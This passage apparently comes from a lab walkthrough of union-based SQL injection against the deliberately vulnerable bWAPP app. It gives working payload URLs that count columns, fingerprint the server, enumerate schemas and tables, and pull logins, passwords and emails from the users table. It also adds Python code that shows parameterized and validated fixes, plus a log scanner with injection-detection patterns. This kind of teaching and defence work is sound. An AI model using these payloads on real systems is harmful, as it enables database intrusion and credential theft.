If we inject a true statement into the SQL query, we get a true response.
Our next task is to see how many columns the current table has. We can do this using the 'order by' clause.
http://192.168.56.101/bWAPP/sqli_2.php?movie=5 order by 1#&action=go
http://192.168.56.101/bWAPP/sqli_2.php?movie=5 order by 8#&action=go

As you can see there are seven columns in the current table. Let's move on to finding the visible columns we can extract data through.
http://192.168.56.101/bWAPP/sqli_2.php?movie=5 and 1=0 union select 1,2,3,4,5,6,7#&action=go

We see that columns 2, 3, 4 and 5 are visible. This is where we will extract data from the database. Let's now find out a little more about the database server.
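The reason the union payloads above work is that the lookup splices the movie parameter straight into the SQL text. The following is an added example, not bWAPP's code or the original post's: it rebuilds the situation in an in-memory SQLite database with a seven-column movies table and a users table (both layouts are assumptions chosen to match the payloads in this walkthrough), shows the vulnerable string-built query beside a parameterized one, and adds an integer check in front of it. The trailing MySQL `#` is left off the payload because SQLite has no `#` comment and the assumed query has nothing after the id that needs truncating.

```python
import sqlite3

# Constructed stand-in for the lab's movie and user tables; the column layout is an
# assumption chosen to line up with the seven-column union payloads in the walkthrough.
def build_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE movies (id INTEGER, title TEXT, release_year TEXT, genre TEXT, "
        "main_character TEXT, imdb TEXT, tickets_stock INTEGER)"
    )
    conn.executemany(
        "INSERT INTO movies VALUES (?, ?, ?, ?, ?, ?, ?)",
        [
            (5, "Movie Five", "2008", "action", "Hero Five", "tt0000005", 90),
            (6, "Movie Six", "2010", "drama", "Hero Six", "tt0000006", 12),
        ],
    )
    conn.execute("CREATE TABLE users (id INTEGER, login TEXT, password TEXT, email TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?, ?)",
        [
            (1, "alice", "hash-of-alice-password", "alice@example.invalid"),
            (2, "bob", "hash-of-bob-password", "bob@example.invalid"),
        ],
    )
    conn.commit()
    return conn


def lookup_vulnerable(conn, movie):
    """The bug the walkthrough exploits: request input is spliced into the SQL text,
    so 'and 1=0 union select ...' becomes part of the statement."""
    sql = f"SELECT * FROM movies WHERE id = {movie}"
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, movie):
    """Fix: the value travels as a bound parameter and is never parsed as SQL syntax."""
    return conn.execute("SELECT * FROM movies WHERE id = ?", (movie,)).fetchall()


def lookup_validated(conn, movie):
    """Defence in depth: the id is an integer, so reject anything that is not one
    before it reaches the database (int() raises ValueError on the payload)."""
    movie_id = int(movie)
    return lookup_parameterized(conn, movie_id)


# The walkthrough's final payload, minus the trailing MySQL '#' comment marker.
PAYLOAD = "5 and 1=0 union select 1,login,password,4,email,6,7 from users"

if __name__ == "__main__":
    conn = build_db()
    print("vulnerable   :", lookup_vulnerable(conn, PAYLOAD))   # users rows leak out
    print("parameterized:", lookup_parameterized(conn, PAYLOAD))  # [] : no id equals that text
    try:
        lookup_validated(conn, PAYLOAD)
    except ValueError as exc:
        print("validated    : rejected ->", exc)
```

Run it and the vulnerable lookup returns the users rows in the movie columns, exactly the effect the walkthrough relies on, while the parameterized version returns nothing because the whole payload is compared as a single value against the id column. The integer check is not a substitute for binding, only a cheap way to reject malformed input early and log it.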
http://192.168.56.101/bWAPP/sqli_2.php?movie=5 and 1=0 union select 1,@@version,@@hostname,database(),user(),6,7#&action=go

We found the version, hostname and database values for the current SQL server. Our next task is to map the database schema to learn where the tables and columns reside and how they are structured.
http://192.168.56.101/bWAPP/sqli_2.php?movie=5 and 1=0 union select 1,count(schema_name),3,4,5,6,7 FROM information_schema.schemata#&action=go

First we get a count of how many databases exist on the database server.
http://192.168.56.101/bWAPP/sqli_2.php?movie=5 and 1=0 union select 1,concat(schema_name),3,4,5,6,7 FROM information_schema.schemata limit 1,1#&action=go
http://192.168.56.101/bWAPP/sqli_2.php?movie=5 and 1=0 union select 1,concat(schema_name),3,4,5,6,7 FROM information_schema.schemata limit 2,1#&action=go
http://192.168.56.101/bWAPP/sqli_2.php?movie=5 and 1=0 union select 1,concat(schema_name),3,4,5,6,7 FROM information_schema.schemata limit 3,1#&action=go

We see that there are 4 databases in the schema. Our next task is to iterate through the databases and pick one to work with.
http://192.168.56.101/bWAPP/sqli_2.php?movie=5 and 1=0 union select 1,2,count(table_name),4,5,6,7 from INFORMATION_SCHEMA.TABLES where table_schema=database()#&action=go

Let's first get a count of how many tables are in the current database.
http://192.168.56.101/bWAPP/sqli_2.php?movie=5 and 1=0 union select 1,2,table_name,4,5,6,7 from INFORMATION_SCHEMA.TABLES where table_schema=database() limit 1,1#&action=go
http://192.168.56.101/bWAPP/sqli_2.php?movie=5 and 1=0 union select 1,2,table_name,4,5,6,7 from INFORMATION_SCHEMA.TABLES where table_schema=database() limit 2,1#&action=go
http://192.168.56.101/bWAPP/sqli_2.php?movie=5 and 1=0 union select 1,2,table_name,4,5,6,7 from INFORMATION_SCHEMA.TABLES where table_schema=database() limit 3,1#&action=go

Incrementing the offset in the limit clause returns the rest of the tables we need to extract data from.
http://192.168.56.101/bWAPP/sqli_2.php?movie=5 and 1=0 union select 1,2,count(column_name),4,5,6,7 from INFORMATION_SCHEMA.COLUMNS where table_name=%27users%27 and table_schema=database()#&action=go

Next we count the number of columns the users table has.
http://192.168.56.101/bWAPP/sqli_2.php?movie=5 and 1=0 union select 1,2,column_name,4,5,6,7 from INFORMATION_SCHEMA.COLUMNS where table_name=%27users%27 and table_schema=database() limit 1,1#&action=go
http://192.168.56.101/bWAPP/sqli_2.php?movie=5 and 1=0 union select 1,2,column_name,4,5,6,7 from INFORMATION_SCHEMA.COLUMNS where table_name=%27users%27 and table_schema=database() limit 2,1#&action=go
http://192.168.56.101/bWAPP/sqli_2.php?movie=5 and 1=0 union select 1,2,column_name,4,5,6,7 from INFORMATION_SCHEMA.COLUMNS where table_name=%27users%27 and table_schema=database() limit 3,1#&action=go

With the column count known, all that is left is to go through the column names, find the ones we want to extract data from, and wrap them in a union select statement.
http://192.168.56.101/bWAPP/sqli_2.php?movie=5 and 1=0 union select 1,login,password,4,email,6,7 from users limit 1,1#&action=go

We have the columns we want to extract; all that is left is to enter the URL and retrieve the data returned on the page.
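Every request in this walkthrough lands in the web server's access log, and the sequence (an order-by probe, then union selects, then information_schema lookups from one client) is a recognisable footprint. The following is an added example, not part of the original post or of bWAPP: a small scanner that parses combined-format log lines, URL-decodes the query string so percent-encoding cannot hide the keywords, tags each request with the stage it matches, and collapses the stages seen per client address. The log lines are constructed to mirror the requests above; client address, timestamps and byte counts are made up.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed access-log lines (combined log format) mirroring the request sequence
# in the walkthrough; the client address, timestamps and byte counts are made up.
SAMPLE_LOG = """\
192.168.56.1 - - [10/Oct/2023:14:02:11 +0000] "GET /bWAPP/sqli_2.php?movie=5&action=go HTTP/1.1" 200 4211
192.168.56.1 - - [10/Oct/2023:14:02:30 +0000] "GET /bWAPP/sqli_2.php?movie=5%20order%20by%208%23&action=go HTTP/1.1" 200 3980
192.168.56.1 - - [10/Oct/2023:14:03:05 +0000] "GET /bWAPP/sqli_2.php?movie=5%20and%201=0%20union%20select%201,@@version,@@hostname,database(),user(),6,7%23&action=go HTTP/1.1" 200 4102
192.168.56.1 - - [10/Oct/2023:14:03:40 +0000] "GET /bWAPP/sqli_2.php?movie=5%20and%201=0%20union%20select%201,2,table_name,4,5,6,7%20from%20INFORMATION_SCHEMA.TABLES%20where%20table_schema=database()%20limit%201,1%23&action=go HTTP/1.1" 200 4102
192.168.56.1 - - [10/Oct/2023:14:04:02 +0000] "GET /bWAPP/portal.php HTTP/1.1" 200 1533
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# One indicator per stage of the walkthrough, applied to the URL-decoded query string.
INDICATORS = {
    "order_by_probe": re.compile(r"\border\s+by\s+\d+", re.I),
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "server_fingerprint": re.compile(r"@@(?:version|hostname)", re.I),
    "schema_enum": re.compile(r"\binformation_schema\.(?:schemata|tables|columns)\b", re.I),
}


def decode_query(target):
    """Return the percent-decoded query string of a request target ('' if none)."""
    return unquote_plus(urlsplit(target).query)


def scan_log(lines):
    """Return one finding per request whose query string trips at least one indicator."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed line: skip it rather than abort the whole scan
        query = decode_query(m.group("target"))
        hits = sorted(name for name, rx in INDICATORS.items() if rx.search(query))
        if hits:
            findings.append({
                "ip": m.group("ip"),
                "ts": m.group("ts"),
                "path": urlsplit(m.group("target")).path,
                "indicators": hits,
            })
    return findings


def stages_per_client(findings):
    """Collapse findings into the set of stages seen per client address; a single
    source that covers probe, union and schema enumeration is the full footprint."""
    stages = {}
    for f in findings:
        stages.setdefault(f["ip"], set()).update(f["indicators"])
    return stages


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG.splitlines())
    for f in found:
        print(f)
    print(stages_per_client(found))
```

On the sample log the benign movie lookup and the portal request produce no finding, the three injection requests are tagged with their stage, and the per-client summary shows one address covering every stage. In production these patterns need tuning against real traffic (a search form that legitimately contains "order by" will trip the first rule), and the decoded query should also be checked after a second decode pass, since double-encoded payloads survive a single `unquote_plus`.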